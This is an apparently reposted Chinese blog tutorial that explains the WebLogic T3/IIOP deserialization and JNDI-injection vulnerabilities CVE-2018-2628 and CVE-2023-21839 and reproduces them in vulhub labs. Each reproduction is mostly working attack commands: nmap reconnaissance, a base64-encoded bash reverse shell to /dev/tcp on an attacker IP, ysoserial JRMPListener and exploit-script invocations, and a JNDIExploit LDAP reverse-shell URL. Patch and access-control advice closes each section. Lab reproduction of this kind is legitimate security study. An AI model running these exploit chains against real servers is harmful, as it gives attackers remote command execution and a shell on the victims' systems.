0


Weblogic反序列化漏洞原理分析及漏洞复现(CVE-2018-2628/CVE-2023-21839复现)

内容目录

Weblogic反序列化漏洞(CVE-2018-2628/CVE-2023-21839)

weblogic中间件

WebLogic是美国Oracle公司出品的一个application server,用于本地和云端开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。WebLogic Server是一个基于JAVAEE架构的中间件,将Java的动态功能和Java Enterprise标准的安全性引入大型网络应用的开发、集成、部署和管理之中,提供了Java Enterprise Edition (EE)和Jakarta EE的可靠、成熟和可扩展的实现。

CVE-2018-2628

漏洞描述

Weblogic Server中的RMI 通信使用T3协议在Weblogic Server和其它Java程序(客户端或者其它Weblogic Server实例)之间传输数据, 服务器实例会跟踪连接到应用程序的每个Java虚拟机(JVM)中, 并创建T3协议通信连接, 将流量传输到Java虚拟机。T3协议在开放WebLogic控制台端口的应用上默认开启。攻击者可以通过T3协议发送恶意的的反序列化数据, 进行反序列化, 实现对存在漏洞的weblogic组件的远程代码执行攻击(开放Weblogic控制台的7001端口,默认会开启T3协议服务,T3协议触发的Weblogic Server WLS Core Components中存在反序列化漏洞,攻击者可以发送构造的恶意T3协议数据,获取目标服务器权限。)

T3协议缺陷实现了Java虚拟机的远程方法调用(RMI),能够在本地虚拟机上调用远端代码。

T3协议:

用于在Weblogic服务器和其他类型的Java程序之间传输信息的协议。Weblogic会跟踪连接到应用程序的每个Java虚拟机,要将流量传输到Java虚拟机,Weblogic会创建一个T3连接。该链接会通过消除在网络之间的多个协议来最大化效率,从而使用较少的操作系统资源。用于T3连接的协议还可以最大限度减少数据包大小,提高传输速度。

RMI方法:

远程方法调用,除了该对象本身的虚拟机,其它的虚拟机也可以调用该对象的方法。(对象的虚拟化和反序列化广泛应用到RMI和网络传输中)

JRMP:

Java远程消息交换协议JRMP。

JRMP是一个Java远程方法协议,该协议基于TCP/IP之上,RMI协议之下。也就是说RMI该协议传递时底层使用的是JRMP协议,而JRMP底层则是基于TCP传递。

RMI默认使用的JRMP进行传递数据,并且JRMP协议只能作用于RMI协议。当然RMI支持的协议除了JRMP还有IIOP协议,而在Weblogic里面的T3协议其实也是基于RMI去进行实现的。

影响版本

Oracle Weblogic Server10.3.6.0.0

Oracle Weblogic Server12.1.3.0.0

Oracle Weblogic Server12.2.1.2.0

Oracle Weblogic Server12.2.1.3.0

漏洞复现

环境:kali linux

靶场:vulhub /vulhub/weblogic/CVE-2018-2628

开启靶场,进入环境:

image-20230919112817669

进行访问:

image-20230919112915568

Nmap扫描目标IP端口,查看是否使用weblogic

nmap -sV192.168.100.134 //靶场ip地址

扫描结果,开放了7001端口,对应weblogic服务以及版本信息

image-20230919113107730

使用Nmap的脚本查看对方是否开启T3协议,查看到目标站点开启了T3协议

nmap -n-v-p7001,7002192.168.100.134 --script=weblogic-t3-info 

扫描结果:说明开启了T3协议

image-20230919113245926

使用扫描工具探测是否存在weblogic漏洞:

工具地址

经过扫描,发现此漏洞(工具可能有所差异不太准确,也可使用图形化界面)

image-20230919115106767

存在CVE-2018-2628漏洞

image-20230919114820553

攻击者需要使用ysoserial启动一个JMRP Server

工具地址

其他架包使用方式都类似,大同小异,查看帮助即可。

JMRP Server在7777端口上监听请求,向目标服务器发送序列化的bash反弹shell命令,反弹监听的端口为9999

PS:

这里使用bash反弹shell,由于Runtime.getRuntime().exec()中不能使用重定向和管道符,这里需要对其进行base64编码再使用

反弹shell命令:

sh-i>& /dev/tcp/192.168.100.1/9999 0>&1

base64编码后:

bash-c{echo,c2ggLWkgPiYgL2Rldi90Y3AvMTkyLjE2OC4xMDAuMS85OTk5IDA+JjE=}|{base64,-d}|{bash,-i}

开启JMRP Server服务:

java-cp ysoserial-all.jar ysoserial.exploit.JRMPListener 7777 CommonsCollections3 "bash -c {echo,c2ggLWkgPiYgL2Rldi90Y3AvMTkyLjE2OC4xMDAuMS85OTk5IDA+JjE=}|{base64,-d}|{bash,-i}"

image-20230919115608885

本地监听9999端口:

image-20230919121223495

接下来使用CVE-2018-2628的 EXP 向目标WebLogic服务器发送攻击载荷(payload)

python2 exp.py 192.168.100.134 7001 ysoserial-all.jar 192.168.100.1 7777 JRMPClient

image-20230919121436393

JMRP服务接受信息:

image-20230919121506408

查看监听端:

image-20230919121555545

EXP和目标服务器建立T3连接,目标服务器weblogic上的JVM虚拟机远程调用了监听程序中的方法执行序列化操作,将流量反弹到nc上

执行命令也是同样的道理,将反弹shell命令改成想要"执行操作的命令"即可。

比如"touch /test.txt"

image-20230919121910643

来到靶机验证一下是否创建成功:

docker-composeexec weblogic /bin/bash 

image-20230919122001066

创建成功,命令成功被执行。

还可以使用工具进行,相对简单,直接利用:

首先开启JRMP服务:

image-20230919140232727

输入JRMP地址,进行执行

image-20230919140142417

JRMP服务返回信息内容:

image-20230919140322425

验证是否创建成功:

成功创建:

image-20230919140355754

修复方案

  • 打上官方的最新补丁
  • 控制T3服务的访问权限(添加白名单仅给指定几台主机使用)

CVE-2023-21839

漏洞描述

Weblogic 允许远程用户在未经授权的情况下通过IIOP/T3进行JNDI lookup 操作,当JDK版本过低或本地存在javaSerializedData时,这可能会导致RCE漏洞。

WebLogic 存在远程代码执行漏洞(CVE-2023-21839/CNVD-2023-04389),由于Weblogic IIOP/T3协议存在缺陷,当IIOP/T3协议开启时,允许未经身份验证的攻击者通过IIOP/T3协议网络访问攻击存在安全风险的WebLogic Server,漏洞利用成功WebLogic Server可能被攻击者接管执行任意命令导致服务器沦陷或者造成严重的敏感数据泄露。

影响版本

  • WebLogic_Server = 12.2.1.3.0
  • WebLogic_Server = 12.2.1.4.0
  • WebLogic_Server = 14.1.1.0.0

CVE-2023-21839是一个weblogic的JNDI注入漏洞

由于Weblogic t3/iiop协议支持远程绑定对象bind到服务端,并且可以通过lookup查看,当远程对象继承自OpaqueReference时,lookup查看远程对象,服务端会调用远程对象getReferent方法。weblogic.deployment.jms.ForeignOpaqueReference继承自OpaqueReference并且实现了getReferent方法,并且存在retVal = context.lookup(this.remoteJNDIName)实现,故可以通过rmi/ldap远程协议进行远程命令执行。

漏洞复现

环境:kali linux

靶场:vulhub vulhub/weblogic/CVE-2023-21839

开启环境:

image-20230919142504679

访问靶场地址:

image-20230919142625342

Nmap扫描:

nmap -sV192.168.100.134

开放了7001端口,以及对应的weblogic服务版本

image-20230919142850639

扫描验证T3是否开启:

nmap -n-v-p7001,7002192.168.100.134 --script=weblogic-t3-info

image-20230919143025768

开启LDAP和HTTP服务

工具地址

java-jar JNDIExploit-1.4-SNAPSHOT.jar -i192.168.100.1    //攻击者ip

查看可以使用的服务内容(payload):

java-jar JNDIExploit-1.4-SNAPSHOT.jar -i192.168.100.1 -u

image-20230919160453083

本地监听端口6666:

image-20230919160315637

在本地执行命令进行攻击

工具地址

java-jar Weblogic-CVE-2023-21839.jar 192.168.100.134:7001 ldap://192.168.100.1:1389/Basic/ReverseShell/192.168.100.1/6666

PS:java环境为JDK8否则无法运行,报错

image-20230919160908122

LDAP和HTTP服务端返回信息:

image-20230919160953947

查看本地监听端口:

成功反弹shell

image-20230919161035118

另一种方法,直接使用工具,发送JNDI地址服务(开启JNDI):

输入url,验证漏洞

image-20230919161322942

验证回显:

image-20230919161303554

开启服务和以上一致

放入JNDI地址当中,然后执行,一键利用,服务端返回相应的信息以及状态:

image-20230919161424153

查看监听:

成功反弹shell

image-20230919161500414

修复方案

  1. 使用连接筛选器临时阻止外部访问7001端口的T3/T3s协议
  2. 禁用IIOP协议。
  3. 升级weblogic版本,更新最新补丁。

本文转载自: https://blog.csdn.net/rumil/article/details/133036788
版权归原作者 rumilc 所有, 如有侵权,请联系我们删除。

“Weblogic反序列化漏洞原理分析及漏洞复现(CVE-2018-2628/CVE-2023-21839复现)”的评论:

还没有评论